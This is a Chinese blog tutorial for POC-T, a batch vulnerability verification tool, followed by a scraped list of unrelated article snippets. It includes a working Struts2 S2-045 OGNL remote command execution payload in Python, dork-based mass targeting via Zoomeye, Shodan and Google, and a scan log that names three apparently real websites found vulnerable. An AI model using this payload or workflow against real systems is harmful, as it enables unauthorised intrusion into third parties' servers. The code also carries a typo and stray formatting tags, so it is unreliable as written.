Wh0ale

POC-T批量poc验证工具

POC-T神器介绍

批量验证要解决的三个关键点：

数据：数据怎么来？
处理：逻辑是什么？
并发：如何实现？

安装过程：

git clone [url]https://github.com/Xyntax/POC-T[/url]

pip install -r requirement.txt

python POC-T.py

数据：

数据来源很丰富，也很贴心。包括单个目标（-iS）、文件导入（-iF）、搜索引擎接口，包括谷歌（-aG）、Zoomeye（-aZ）、撒旦（-aS），这些接口的key设置支持运行时手动输入，也支持预先设置，在根目录下的toolkit.conf中设置，谷歌还支持代理，以便扶墙，是不是很贴心，参数–limit来限制搜索数目。其他来源参考帮助。

处理逻辑：

逻辑验证也就是poc，在script已经有很多作者维护的poc脚本，可以利用参数–show来列出poc脚本名

E:\工具管理\漏洞利用\POC-T-2.0>POC-T.py --show
[*] Script Name (total:53)
  activemq-upload
  activemq-weakpass
  bingc
  brute-example
  cdn-detect
  confluence-traversal
  fastcgi-rce
  fiyo2.0.7-getshell
  glassfish-traversal
  jboss-rce
  jetspeed-rest-unauth
  joomla-registrationpro-sqli
  joomla-videoflow-sqli
  joomla-videogallerylite-sqli
  kubernetes-unauth
  maccms8-rce
  memcached-unauth
  metinfo-504-sqli
  mongodb-unauth
  navis-webaccess-sqli
  opensshd-user-enum
  phpcms9.6.0-getshell
  phpcms9.6.0-sqli
  phpmyadmin-auth-rce
  redis-cron-getshell
  redis-sshkey-getshell
  redis-unauth
  redis-web-probe
  resin-doc-traversal
  rsync-weakpass
  samsoftech-admin-bypass
  shiro-deserial-rce
  siemens-camera-getpwd
  solr-unauth
  spider-example
  struts2-devmode
  struts2-s2032
  struts2-s2045
  test
  vbulletin-ssrf
  vote-example
  weblogic-ssrf-netmap
  weblogic-wls
  wp-4.4-ssrf
  wp-4.7-userinfo
  wp-4.7.1-restapi
  wp-bonkersbeat-filedownload
  wp-forcedownload
  wp-ypo-filedownload
  zabbix-jsrpc-mysql-exp
  zabbix-jsrpc-sqli
  zabbix-weakpass
  zonetransfer

并发实现：

并发的实现作者自己的框架，我们作为使用者不必太纠结原理，只要知道支持多线程（-eT）Gevent（-eG）两种并发模式就可以了。POC-T的效率非常之高，根据笔者测试，设置线程为30（默认10），测试2000+个目标不到3分钟就可以完成。

 

最后的命令格式大概是这样子

 

Python POC-T.py –s poc –aZ “port:22” –limit 100

Python POC-T.py –s poc –aG “url:index.php” –limit 100 –gproxy “socket5 127.0.0.1 1080”

Python POC-T.py –s poc –iS http://host//login.php?id=1

Python POC-T.py –s poc –iF /root/pentest/vul.txt

POC脚本编写：

为什么说POC-T很轻便呢，我认为就体现在poc脚本编写上，所有的验证只需要一个poc（）函数就可以，成功就返回True或者自定义信息，失败就返回False，除此之外没有任何限制。没有实例，一切文章都是纸老虎。下面我们就以前段时间火爆的struts2-s045漏洞为例，详细说下poc的编写，在script目录下有个test.py就是poc脚本的一个demo，就在这个基础上编写我们的poc。

网上爆出的验证代码为

 

def poc(url):

register_openers()

    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})

    header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

    header["Content-Type"]="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

    request = urllib2.Request(url,datagen,headers=header)

    response = urllib2.urlopen(request)

    body=response.read()



return body
 


这段代码，大概意思就是执行了“echo nMask”，也就是说返回的body中如果有字符串nMask就意味着漏洞存在，否则不存在。那么我们的poc代码就可以这么写

 

import urllib2[/size][/font]

[align=left][font=宋体][size=3]from poster.encode import multipart_encode

from poster.streaminghttp import register_openers

def poc(url):

register_openers()

        datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})

        header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"

        header["Content-Type"]="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask || whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

        try:

            request = urllib2.Request(url,datagen,headers=header)

            response = urllib2.urlopen(request,timeout=5)

            body = response.readlines()[0:2]

        except:

                return False

        if "nMask" in body:

                return Ture

        else:

                return False
 


建议在脚本中处理Exception，如果线程运行中发现Exception，将使框架终止全部任务并打印错误信息。由于网络请求中经常出现连接中断等错误，一种简单的做法是：

 

def poc(input_str)

    try:

    ...全部脚本逻辑...

    except:

        return False

插件：

C:\Users\49974>cd E:\工具管理\漏洞利用\POC-T-2.0

C:\Users\49974>e:

E:\工具管理\漏洞利用\POC-T-2.0>pip install -r requirement.txt
Requirement already satisfied: requests in c:\python27\lib\site-packages (from -r requirement.txt (line 1))
Collecting gevent (from -r requirement.txt (line 2))
  Downloading gevent-1.2.2-cp27-cp27m-win_amd64.whl (637kB)
    100% |████████████████████████████████| 645kB 48kB/s
Collecting shodan (from -r requirement.txt (line 3))
  Downloading shodan-1.7.7.tar.gz (42kB)
    100% |████████████████████████████████| 51kB 81kB/s
Collecting google-api-python-client (from -r requirement.txt (line 4))
  Downloading google_api_python_client-1.6.5-py2.py3-none-any.whl (53kB)
    100% |████████████████████████████████| 61kB 67kB/s
Collecting greenlet>=0.4.10 (from gevent->-r requirement.txt (line 2))
  Downloading greenlet-0.4.13-cp27-cp27m-win_amd64.whl
Requirement already satisfied: click in c:\python27\lib\site-packages (from shodan->-r requirement.txt (line 3))
Collecting click-plugins (from shodan->-r requirement.txt (line 3))
  Downloading click-plugins-1.0.3.tar.gz
Collecting colorama (from shodan->-r requirement.txt (line 3))
  Downloading colorama-0.3.9-py2.py3-none-any.whl
Collecting XlsxWriter (from shodan->-r requirement.txt (line 3))
  Downloading XlsxWriter-1.0.2-py2.py3-none-any.whl (139kB)
    100% |████████████████████████████████| 143kB 44kB/s
Requirement already satisfied: six<2dev,>=1.6.1 in c:\python27\lib\site-packages (from google-api-python-client->-r requirement.txt (line 4))
Collecting uritemplate<4dev,>=3.0.0 (from google-api-python-client->-r requirement.txt (line 4))
  Downloading uritemplate-3.0.0-py2.py3-none-any.whl
Collecting oauth2client<5.0.0dev,>=1.5.0 (from google-api-python-client->-r requirement.txt (line 4))
  Downloading oauth2client-4.1.2-py2.py3-none-any.whl (99kB)
    100% |████████████████████████████████| 102kB 98kB/s
Collecting httplib2<1dev,>=0.9.2 (from google-api-python-client->-r requirement.txt (line 4))
  Downloading httplib2-0.11.0.tar.gz (216kB)
    100% |████████████████████████████████| 225kB 32kB/s
Collecting rsa>=3.1.4 (from oauth2client<5.0.0dev,>=1.5.0->google-api-python-client->-r requirement.txt (line 4))
  Downloading rsa-3.4.2-py2.py3-none-any.whl (46kB)
    100% |████████████████████████████████| 51kB 19kB/s
Requirement already satisfied: pyasn1-modules>=0.0.5 in c:\python27\lib\site-packages (from oauth2client<5.0.0dev,>=1.5.0->google-api-python-client->-r requirement.txt (line 4))
Requirement already satisfied: pyasn1>=0.1.7 in c:\python27\lib\site-packages (from oauth2client<5.0.0dev,>=1.5.0->google-api-python-client->-r requirement.txt (line 4))
Installing collected packages: greenlet, gevent, click-plugins, colorama, XlsxWriter, shodan, uritemplate, rsa, httplib2, oauth2client, google-api-python-client
  Running setup.py install for click-plugins ... done
  Running setup.py install for shodan ... done
  Running setup.py install for httplib2 ... done
Successfully installed XlsxWriter-1.0.2 click-plugins-1.0.3 colorama-0.3.9 gevent-1.2.2 google-api-python-client-1.6.5 greenlet-0.4.13 httplib2-0.11.0 oauth2client-4.1.2 rsa-3.4.2 shodan-1.7.7 uritemplate-3.0.0

E:\工具管理\漏洞利用\POC-T-2.0>POC-T.py -h
usage: python POC-T.py -s bingc -aZ "port:8080"

powered by cdxy 

ENGINE:
  -eT                   Multi-Threaded engine (default choice)
  -eG                   Gevent engine (single-threaded with asynchronous)
  -t NUM                num of threads/concurrent, 10 by default

SCRIPT:
  -s NAME               load script by name (-s jboss-rce) or path (-s
                        ./script/jboss.py)

TARGET:
  -iS TARGET            scan a single target (e.g. www.wooyun.org)
  -iF FILE              load targets from targetFile (e.g.
                        ./data/wooyun_domain)
  -iA START-END         generate array from int(start) to int(end) (e.g.
                        1-100)
  -iN IP/MASK           generate IP from IP/MASK. (e.g. 127.0.0.0/24)

API:
  -aZ DORK, --zoomeye DORK
                        ZoomEye dork (e.g. "zabbix port:8080")
  -aS DORK, --shodan DORK
                        Shodan dork.
  -aG DORK, --google DORK
                        Google dork (e.g. "inurl:admin.php")
  -aF DORK, --fofa DORK
                        FoFa dork (e.g. "banner=users && protocol=ftp")
  --limit NUM           Maximum searching results (default:10)
  --offset OFFSET       Search offset to begin getting results from
                        (default:0)
  --search-type TYPE    [ZoomEye] search type used in ZoomEye API, web or host
                        (default:host)
  --gproxy PROXY        [Google] Use proxy for Google (e.g. "sock5 127.0.0.1
                        7070" or "http 127.0.0.1 1894"

OUTPUT:
  -o FILE               output file path&name. default in ./output/
  -oF, --no-file        disable file output
  -oS, --no-screen      disable screen output

MISC:
  --single              exit after finding the first victim/password.
  --show                show available script names in ./script/ and exit
  --browser             Open notepad or web browser to view report after task
                        finished.

SYSTEM:
  -v, --version         show program's version number and exit
  -h, --help            show this help message and exit
  --update              update POC-T from github source

E:\工具管理\漏洞利用\POC-T-2.0>POC-T.py --show
[*] Script Name (total:53)
  activemq-upload
  activemq-weakpass
  bingc
  brute-example
  cdn-detect
  confluence-traversal
  fastcgi-rce
  fiyo2.0.7-getshell
  glassfish-traversal
  jboss-rce
  jetspeed-rest-unauth
  joomla-registrationpro-sqli
  joomla-videoflow-sqli
  joomla-videogallerylite-sqli
  kubernetes-unauth
  maccms8-rce
  memcached-unauth
  metinfo-504-sqli
  mongodb-unauth
  navis-webaccess-sqli
  opensshd-user-enum
  phpcms9.6.0-getshell
  phpcms9.6.0-sqli
  phpmyadmin-auth-rce
  redis-cron-getshell
  redis-sshkey-getshell
  redis-unauth
  redis-web-probe
  resin-doc-traversal
  rsync-weakpass
  samsoftech-admin-bypass
  shiro-deserial-rce
  siemens-camera-getpwd
  solr-unauth
  spider-example
  struts2-devmode
  struts2-s2032
  struts2-s2045
  test
  vbulletin-ssrf
  vote-example
  weblogic-ssrf-netmap
  weblogic-wls
  wp-4.4-ssrf
  wp-4.7-userinfo
  wp-4.7.1-restapi
  wp-bonkersbeat-filedownload
  wp-forcedownload
  wp-ypo-filedownload
  zabbix-jsrpc-mysql-exp
  zabbix-jsrpc-sqli
  zabbix-weakpass
  zonetransfer


E:\工具管理\漏洞利用\POC-T-2.0>POC-T.py -s struts2-s2045 -iF C:\Users\49974\Desktop\st2.txt

                                             __/
    ____     ____     _____           ______/ __/
   / __ \   / __ \   / ___/   ____   /__  __/_/
  / /_/ /  / /_/ /  / /___   /___/     / /
 / /___/   \____/   \____/            / /
/_/                                  /_/
    { Version 2.0.5 by cdxy mail:[email protected] }

[+] Load custom script: struts2-s2045.py
[+] Initialize targets...
[+] Total: 482
[+] Set the number of concurrent: 10
[S2-045]http://www.m56.cn/login.action
[S2-045]http://oa-sms.com/login.login.action
[S2-045]http://wzxt.zdwlcloud.com/Login.action
                                                                                                                  3 found | 0 remaining | 482 scanned in 83.58 seconds
[*] System exit.

E:\工具管理\漏洞利用\POC-T-2.0>

同时struts2-045漏洞测出了两种结果，经过测试poc-t出来的结果较为准确

其他功能：

如果我们搞明白了批量需要解决的那三个关键问题，就会发现这个框架不仅可以用作poc批量验证，还可以用作它途，只要原理一样就可以。比如爆破、爬虫、采集等。作者也给出了相应实例

后续研究：

使用

poc-t.py --batch -iF 1.txt 使用fuzz脚本
poc-t.py -eT -t 20 -s xx -iF 1w.txt

插件

waf 检测waf 并返回没有waf的url
craw 爬取链接中的相关地址
vulscan 检测sql注入漏洞
portscan 端口扫描，检测弱口令服务

其他优秀的poc批量验证工具：

Pocsuite:   https://github.com/knownsec/Pocsuite
Pentestdb:   https://github.com/alpha1e0/pentestdb

s0m3poc:  https://github.com/s0m30ne/s0m3poc

原文

【Linux 从基础到进阶】Puppet配置管理工具使用爱技术的小伙子 Linux从基础到进阶 linux puppet 运维
Puppet配置管理工具使用Puppet是一种开源的配置管理工具，广泛用于自动化管理和配置服务器。它通过声明式的语言定义系统状态，能够跨多台服务器实现一致性配置。Puppet对运维团队来说，是一种强大的工具，能够有效管理服务器配置并简化操作复杂性。本文将详细介绍Puppet的核心概念、安装步骤、以及如何在CentOS和Ubuntu系统上进行配置和管理。1.Puppet的核心概念在使用Puppet之
【Trace】QQ+微信聊天记录分析工具 civilpy pandas
Trace-痕迹阿里云：https://www.alipan.com/s/x6fqXe1jVg1百度云:https://pan.baidu.com/s/1FmchOjK2wAMwE5aQds7pIw?pwd=td7s该工具使用前，先配置随机码（当前）：85EC【范例1】QQ个人聊天记录分析第1步：导出个人聊天记录或QQ群聊天记录，格式txt第2步：打开软件Trace-痕迹.exe，会自动弹出两个窗
04 cuttman切图工具星chen
Photoshopcc使用:image.pngcuttman切图工具使用:打开cuttman切图工具image.png=
Percona-toolkit工具详解小一_d28d
1.pt工具安装[root@master~]#yuminstall-ypercona-toolkit-3.1.0-2.el7.x86_64.rpm2.常用工具使用介绍2.1pt-archiver归档表#重要参数--limit100每次取100行数据用pt-archive处理--txn-size100设置100行为一个事务提交一次，--where'id>/root/db/checksum.logpt
Node.js入门与生态全解析：包管理与构建工具详解 Switch616 前端 node.js 服务器前端 es6 前端框架
Node.js入门与生态全解析：包管理与构建工具详解目录包管理使用npm和yarn：项目依赖管理的利器创建和发布npm包：实现模块化与共享⚙️构建工具使用Webpack和Babel：高效打包与代码转换配置构建流程：优化与自动化的最佳实践包管理-使用npm和yarn：项目依赖管理的利器在Node.js的开发过程中，包管理是核心环节之一，它提供了管理第三方库、共享代码及简化依赖项管理的功能。Node.
嵌入式设备上SystemTap调试工具使用塵觴葉杂谈 linux bpf
SystemTap调试工具简介SystemTap调试器常用于Linux内核的动态调试，不过该工具集也可用于应用的跟踪调试。随着Linux内核及其应用程序的复杂度不断加深，使用一些在功能上区别于传统的GDB调试工具就变得越来越重要了。这类调试工具具有低延时(LowLatency)，高性能，动态调试的特点。嵌入式Linux设备的系统软件通常不需从头开发，这些调试工具可以帮助开发者快速理解Linux内核
在Windows系统上以服务的形式部署SpringBoot项目程序员小H
背景由于项目需要是实现Office文档的在线预览，为了更好的预览效果使用MSOffice对（doc、docx、xls、xlsx、ppt、pptx、txt）转换为PDF文件进行预览，MSOffice不支持Linux，所以文档转换服务只能部署在Windows服务器上，需要将文档转换服务添加到windows服务中，以服务的放是运行，从而实现开机自启动。部署工具使用官方推荐的工具：winsw工具下载：ht
【车载测试面试：各大车企面试题汇总】 @逝水流年轻染尘@ 面试职场和发展
HIL（硬件在环）测试、UDS功能诊断、UDS自动化诊断、数据库制作、DTC故障制造、CANoe工具使用、ECU刷写、报文解析、导航测试、车控测试、OTA升级测试、TBOX测试等TBOX深圳涉及过T-BOX测试吗Ota升级涉及的台架环境是什么样的？上车实测之前有没有一个仿真环境台架环境都什么零部件T-BOX了解多少Linux和shell有接触吗单片机车机有没有热点啊WiFi这个功能有没有涉及一些法
【ttf压缩】网页开发中引入字体文件过大，加载缓慢的解决办法【字蛛】【web Font】 Luckstar_wei 技术 css html 字体 ttf压缩中文字体压缩
yueyemoyanweb中文字体演示与工具使用请前往主页：http://font-spider.org/需要安装node.js输入以下命令：npminstallfont-spider-g运行安装成功之后就开始压缩了我的目录是这样的我的css文件开头是这样的这里要确保ttf文件一定要有，其他的不管在你的html中也引用了相应的css文件接下来就是最后一步了生成新的字体库nodejs命令行输入fon
Python爬取彼岸图4k壁纸，想要什么类型的壁纸就输入什么壁纸，太方便了。爬遍天下无敌手 Python python html js java epoll
你桌面的壁纸还是用的默认壁纸么？太low了，今天教你用python爬取彼岸图网的4k壁纸，想要什么类型的壁纸就爬什么壁纸，快点来跟我一起试试吧！这个壁纸怎么样？喜欢吗？你值得拥有。。。代码操作一下工具使用开发环境python3.6Windows10开发工具pycharm工具包lxml,os,tkinter思路解析1.定义可视化窗口，并设置窗口和主题大小布局2.定义触发事件1,调用main函数3.构
QNET 弱网测试工具测试在路上
最近在找稳定的弱网测试工具，偶然发现腾讯竟然有一款：QNET弱网测试工具使用方法很简答：下载QNETAPP安装，用QQ登陆后，即可开始。可用的弱网环境：image自定义弱网环境：image实际使用情况：左边工具栏可随意切换网络环境，一般大约3秒左右就会切换成功；右边工具栏实时显示网络情况；image还可以自动抓包image下载方式：应用宝搜索下载image
【数据分析工具】使用Pandas进行数据分析爱技术的小伙子数据分析 pandas 数据挖掘
数据分析工具使用Pandas进行数据分析引言在数据驱动的世界中，数据分析已经成为许多领域的核心技能。Pandas作为Python最流行的数据处理和分析库之一，以其强大的数据操作能力和简单易用的接口，广泛应用于各种数据分析任务。本文将介绍如何使用Pandas进行数据分析，并展示其在数据处理、清洗和分析中的强大功能。1.Pandas简介Pandas是基于Python的开源数据分析工具，特别适用于结构化
推荐书籍：FFmpeg从入门到精通微创光电技术团队音视频
本书是一本介绍FFmpeg的实战技术指南，全书共10章，分为两个部分。第一部分部分（第1～7章）为FFmpeg的命令行使用篇，介绍了FFmpeg的基础组成部分、FFmpeg工具使用、FFmpeg的封装操作、FFmpeg的转码操作、FFmpeg的流媒体操作、FFmpeg的滤镜操作、FFmpeg的设备操作。第二部分（第8～10章）为FFmpeg的API使用篇，介绍了FFmpeg封装部分的API使用操作
CPU/内存/综合性能评估工具汇总-1:lmbench So_shine linux调试工具和性能量化性能优化
目录一、概括二、lmbench一、概括嵌入式开发中对要设计的产品、立项的项目进行设计时，往往需要对关键芯片进行性能评估，本文主要总结基于linux系统的产品在性能评估时的工具使用总结，在aarch64(arm64平台下测试)，板卡根文件系统为debian系统。工具列表如下：名称作用git源码链接lmbench带宽测评，反应时间测评https://github.com/redrose2100/lmb
精通JVM监控与调优：工具使用与命令指南道长不会写代码 jvm
精通JVM监控与调优：工具使用与命令指南1.JVM监控工具概览1.1监控工具列表2.jconsole使用指南2.1操作步骤2.2常用命令3.VisualVM使用指南3.1操作步骤3.2常用命令4.jstack使用指南4.1操作步骤4.2常用命令5.jmap使用指南5.1操作步骤5.2常用命令6.jstat使用指南6.1操作步骤6.2常用命令7.MAT使用指南7.1操作步骤7.2常用命令8.GCVi
Python通过读取配置文件开发数据库链接脚本工具（统一封装 mysql，mongodb，redis，达梦，人大进仓等主流国内外数据库）大白菜程序猿 python 数据库 python mysql
Python通过读取配置文件开发数据库链接脚本工具（统一封装mysql，mongodb，redis，达梦，人大进仓等主流国内外数据库）一.为什么要封装工具使用配置文件管理数据库配置文件1.数据持久性与安全性数据持久性：配置文件中的数据在应用程序或系统重启后仍然保留，不会丢失。这对于数据库连接信息（如数据库URL、用户名、密码等）尤为重要，因为它们需要在每次应用程序启动时都被正确加载。安全性：通过将
【Python】使用Python对pdf,svg,png等进行转换 Technicalflight python 人工智能开发语言
Technicalflight转换工具使用Python对pdf,svg,png等进行转换代码开源在Github：https://github.com/Technicalflight/Python-Transformation感谢你们的小星星！！！！上手指南将Python文件下载后，先将requirements.txt文件中的依赖进行下载开发前的配置要求Python3安装步骤在Window平台上安装
chrome-网页gif截图插件丿似锦 Google chrome 前端
简介本文介绍网页中gif截图工具使用，便于日常对网页中动态效果或元素进行截图软件介绍CapturetoaGif是用来录制屏幕并将其保存为GIF格式文件的chrome插件工具。它允许用户指定捕捉屏幕上的活动，比如应用程序界面、游戏过程或者教程视频等，并将这些活动转换成轻量级的动画GIF文件。安装在线扩展程序管理页，打开chrome应用商店，检索安装即可离线https://download.csdn.
使用密钥文件 SSH 登录服务器：Windows、macOS使用终端或连接工具 shyuu_ ssh 服务器 windows linux 云计算 macos 运维
文章目录使用密钥文件SSH登录服务器1.Windows端方法1：使用`ssh`命令指定密钥文件方法2：使用SSH配置文件2.macOS端方法1：使用`ssh`命令指定密钥文件方法2：使用SSH配置文件方法3：使用`ssh-add`命令（可选）3.在多平台使用连接工具使用MobaXterm指定私钥文件使用Tabby指定密钥文件使用其他工具的通用方法使用密钥文件SSH登录服务器1.Windows端在W
机器学习先导课《数值分析》（1）——绪论及误差分析 WarrenRyan
数值分析——绪论及误差分析数值分析——绪论及误差分析全文目录数值分析的作用及其学习工具使用数值分析常用工具数值分析的具体实例（多项式简化求值）计算机数值误差产生机理计算机的数值存储方式计算机误差产生原因误差误差限与精度模型误差观测误差截断误差舍入误差有效数字缺失误差的产生和避免误差的传播算法设计的稳定性与病态条件病态问题计算的稳定性练习题ReferenceAboutMe联系方式全文目录（博客园）机
RAG与LLM原理及实践（14）---- Python + MinIO + Kafka进阶 PhoenixAI8 RAG Milvus Chroma 源码及实践 milvus kafka python minio
目录背景根因分析配置构造创建network构造zookeeper构造kafka参数构造原理解析图解全过程解析工具使用kafkacat查看brokerpython实现pythonsend+kafkarecvpython代码kafkarecv运行效果pythonrecv+kafkasendpython代码kafkasend运行效果思考pythonsend+pythonrecv原理运行效果背景如果你已经
最近发现了很多好用的工具，推荐给大家 ʚ小华编辑器贴图
截图工具（PixPin）：目前只有windows,还没有mac版本，非常强大！！！PixPin是一款优秀的图像标注工具，它可以帮助用户在图像上添加注释、标记和说明。这个软件适用于各种不同的场景，例如教育、商业、设计和医学等领域的图像处理和注释需求。高效率：PixPin的直观界面和丰富的注释工具使用户可以更快地完成图像标注任务。同时，它还支持云端同步和导出功能，使得用户可以轻松地共享和交流注释内容。
工具使用-CrxMouse 手势插件 TE-茶叶蛋工具使用 chrome
文章目录前言一、CrxMouse是什么？二、使用CrxMouse内置的常用手势总结前言鼠标手势插件提高摸鱼效率。一、CrxMouse是什么？CrxMouse是一款Chrome浏览器的手势插件，它可以通过鼠标手势来进行快速的操作和导航。使用CrxMouse插件，可以在浏览器中进行各种操作，如打开新标签页、切换标签页、进行前进和后退等。CrxMouse支持多种手势，包括单击、双击、滚动、拖动等，可以根
Oracle12cR2之IMP与EXP命令行工具使用及参数说明小袁搬码数据库 Oracle oracle 数据库数据库导入导出
Oracle12cR2之IMP与EXP命令行工具使用及参数说明文章目录Oracle12cR2之IMP与EXP命令行工具使用及参数说明1.IMP命令行使用及参数说明1.IMP命令行使用2.IMP命令行参数说明2.EXP命令行使用及参数说明1.EXP命令行使用2.EXP命令行参数说明在Oracle数据库中，IMP和EXP是两个常用的命令行工具，用于数据库的导入和导出操作;通过使用这两个工具，可以方便地
离线地图瓦片跟矢量数据下载 YTW
离线地图2D瓦片跟3D矢量数据下载工具使用介绍一、离线地图的各类自定义地图瓦片样式（可以随意根据自己喜欢进行配置）1）、进入软件首页，选择行政区域下载瓦片（如下图）2）、选择下载参数，勾选地图下载的级别，存储格式可选2D或3D数据（如下图）3）、点击任务列表，点击上方操作按钮（如下图）4）、卫星图瓦片下载，切换至影像瓦片（如下图）5）、个性化地图下载，选择已配置的个性化项（如下图）6）、可自己设计
UFT工具使用一（12.02） nayli
工具简介UnifiedFunctionalTesting(QuickTestProfessional)，简写UFT，最初是由MercuryInteractive公司开发的一种自动化测试工具，在2006年被HP收购。imageUFT主要应用于：功能测试、回归测试、servicetesting。使用UFT、你可以在网页或者基于客户端PC应用程序上、自动模拟用户行为、在不同windows操作系统以及不同
提取游戏音频文件.bnk 类人_猿智能工具类目游戏音频文件提取 .bnk文件提取 .MP3 .ogg
提取游戏音频文件.bnk什么是.bnk准备Wwise-Unpacker工具使用Wwise-Unpacker工具总结什么是.bnk.bnk其实是一种对音频的加密方式，一个.bnk文件中通常包含了多个语音文件，一般可以使用Wwise-Unpacker来解码.bnk格式文件准备Wwise-Unpacker工具Wwise-Unpacker点击下载并解压如下使用Wwise-Unpacker工具将你要解码的.
一览20个生成式AI关键应用领域案例 AI生成未来 AIGC 人工智能 AIGC chatgpt
生成式人工智能的案例正迅速增长，因为这种新兴的人工智能技术迅速获得了广泛应用。目前，生成式人工智能的示例已经在从医疗保健到制造业、金融业和营销等各个行业中得到了广泛应用。随着开发人员努力将原始技术发展成为新的用途，生成式人工智能工具在其他行业中的应用实例也在不断增加。为什么生成式人工智能如此受欢迎呢？生成式人工智能是一种根据先前数据生成新内容的技术。当前的生成式人工智能工具使用户能够通过输入数据开
Burpsuite工具使用想拿 0day 的脚步小子工具 web安全网络安全系统安全安全
1.简介BurpSuite是用于攻击web应用程序的集成平台。它包含了许多工具，并为这些工具设计了许多接口，以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息，持久性，认证，代理，日志，警报的一个强大的可扩展的框架。使用前需要安装java环境，常用来进行web应用的暴力破解。BurpIntruder是一个强大的工具，用于自动对Web应用程序自定义的攻击，BurpIntrud
Android内存泄漏检测之LeakCanary2.0（Kotlin版）的实现原理 vivo互联网技术
一、概述LeakCanary是一款非常常见的内存泄漏检测工具。经过一系列的变更升级，LeakCanary来到了2.0版本。2.0版本实现内存监控的基本原理和以往版本差异不大，比较重要的一点变化是2.0版本使用了自己的hprof文件解析器，不再依赖于HAHA，整个工具使用的语言也由Java切换到了Kotlin。本文结合源码对2.0版本的内存泄漏监控基本原理和hprof文件解析器实现原理做一个简单地分
Java开发中，spring mvc 的线程怎么调用？小麦麦子 spring mvc
今天逛知乎，看到最近很多人都在问spring mvc 的线程http://www.maiziedu.com/course/java/ 的启动问题，觉得挺有意思的，那哥们儿问的也听仔细，下面的回答也很详尽，分享出来，希望遇对遇到类似问题的Java开发程序猿有所帮助。问题：在用spring mvc架构的网站上，设一线程在虚拟机启动时运行，线程里有一全局
maven依赖范围 bitcarter maven
1.test 测试的时候才会依赖，编译和打包不依赖，如junit不被打包 2.compile 只有编译和打包时才会依赖 3.provided 编译和测试的时候依赖，打包不依赖，如：tomcat的一些公用jar包 4.runtime 运行时依赖，编译不依赖 5.默认compile 依赖范围compile是支持传递的，test不支持传递 1.传递的意思是项目A，引用
Jaxb org.xml.sax.saxparseexception : premature end of file darrenzhu xml premature JAXB
如果在使用JAXB把xml文件unmarshal成vo(XSD自动生成的vo)时碰到如下错误： org.xml.sax.saxparseexception : premature end of file 很有可能时你直接读取文件为inputstream，然后将inputstream作为构建unmarshal需要的source参数。InputSource inputSource = new In
CSS Specificity 周凡杨 html 权重 Specificity css
有时候对于页面元素设置了样式，可为什么页面的显示没有匹配上呢？ because specificity CSS 的选择符是有权重的，当不同的选择符的样式设置有冲突时，浏览器会采用权重高的选择符设置的样式。规则： HTML标签的权重是1 Class 的权重是10 Id 的权重是100
java与servlet g21121 servlet
servlet 搞java web开发的人一定不会陌生，而且大家还会时常用到它。下面是java官方网站上对servlet的介绍： java官网对于servlet的解释写道 Java Servlet Technology Overview Servlets are the Java platform technology of choice for extending and enha
eclipse中安装maven插件 510888780 eclipse maven
1.首先去官网下载 Maven： http://www.apache.org/dyn/closer.cgi/maven/binaries/apache-maven-3.2.3-bin.tar.gz 下载完成之后将其解压，我将解压后的文件夹：apache-maven-3.2.3，并将它放在 D:\tools目录下，即 maven 最终的路径是：D:\tools\apache-mave
jpa@OneToOne关联关系布衣凌宇 jpa
Nruser里的pruserid关联到Pruser的主键id，实现对一个表的增删改，另一个表的数据随之增删改。 Nruser实体类 //***************************************************************** @Entity @Table(name="nruser") @DynamicInsert @Dynam
我的spring学习笔记11-Spring中关于声明式事务的配置 aijuans spring 事务配置
这两天学到事务管理这一块，结合到之前的terasoluna框架，觉得书本上讲的还是简单阿。我就把我从书本上学到的再结合实际的项目以及网上看到的一些内容，对声明式事务管理做个整理吧。我看得Spring in Action第二版中只提到了用TransactionProxyFactoryBean和<tx:advice/>,定义注释驱动这三种，我承认后两种的内容很好，很强大。但是实际的项目当中
java 动态代理简单实现 antlove java handler proxy dynamic service
dynamicproxy.service.HelloService package dynamicproxy.service; public interface HelloService { public void sayHello(); } dynamicproxy.service.impl.HelloServiceImpl package dynamicp
JDBC连接数据库百合不是茶 JDBC编程 JAVA操作oracle数据库
如果我们要想连接oracle公司的数据库，就要首先下载oralce公司的驱动程序，将这个驱动程序的jar包导入到我们工程中; JDBC链接数据库的代码和固定写法; 1,加载oracle数据库的驱动; &nb
单例模式中的多线程分析 bijian1013 java thread 多线程 java多线程
